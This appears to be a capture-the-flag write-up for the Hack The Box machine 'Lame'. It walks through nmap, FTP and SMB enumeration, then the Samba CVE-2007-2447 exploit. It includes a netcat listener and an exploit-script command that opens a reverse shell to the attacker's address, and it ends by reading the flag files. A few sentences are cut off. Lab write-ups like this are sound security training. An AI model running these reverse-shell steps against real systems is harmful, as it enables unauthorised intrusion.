Lame is an easy Linux box that can be exploited with CVE-2007-2447 - no privilege escalation was required.
Nmap discovered the following open ports and services:
nmap -sC -sV -Pn -oN fullnmap 10.129.24.78 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.33 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
The first thing I checked was Anonymous login with FTP:
ftp 10.129.24.78 Connected to 10.129.24.78. 220 (vsFTPd 2.3.4) Name (10.129.24.78:jeroen): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. 226 Directory send OK.
FTP Anonymous Login
Anonymous login was successful (username: anonymous, password: blank). Unfortunately, no useful information was found here.
The next thing was to enumerate SMB with smbmap to check for shares and permissions:
smbmap -H 10.129.24.78 [+] IP: 10.129.24.78:445 Name: 10.129.24.78 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers tmp READ, WRITE oh noes! opt NO ACCESS IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian)) ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
The tmp directory is both, readable and writeable. You can connect with:
The share contained the following files and directories:
smb: \> ls . D 0 Mon Oct 19 14:08:46 2020 .. DR 0 Sun May 20 19:36:12 2012 5303.jsvc_up R 0 Mon Oct 19 12:57:23 2020 .ICE-unix DH 0 Mon Oct 19 12:56:14 2020 vmware-root DR 0 Mon Oct 19 12:56:22 2020 .X11-unix DH 0 Mon Oct 19 12:56:36 2020 .X0-lock HR 11 Mon Oct 19 12:56:36 2020
No sensitive files or information was stored here.
The next thing was to google the Netbios version that nmap discovered:
netbios-ssn Samba smbd 3.0.20-Debian
This resulted in the following CVE: 2007-2447 that could potentially be used to exploit the target.
This file was downloaded to exploit this manually.
A netcat listener was opened:
nc -nvlp 4444 and the following command was used:
python3 usermap_script.py 10.129.24.78 139 10.10.14.33 4444
This opens a netcat shell from where you can navigate to the
home directory and see the following users:
cd /home ls ftp makis service user
The user makis contains the
To obtain root, you can simply cat
cat /home/makis/user.txt && cat /root/root.txt 69454a937d9[...] 92caac3be14[...]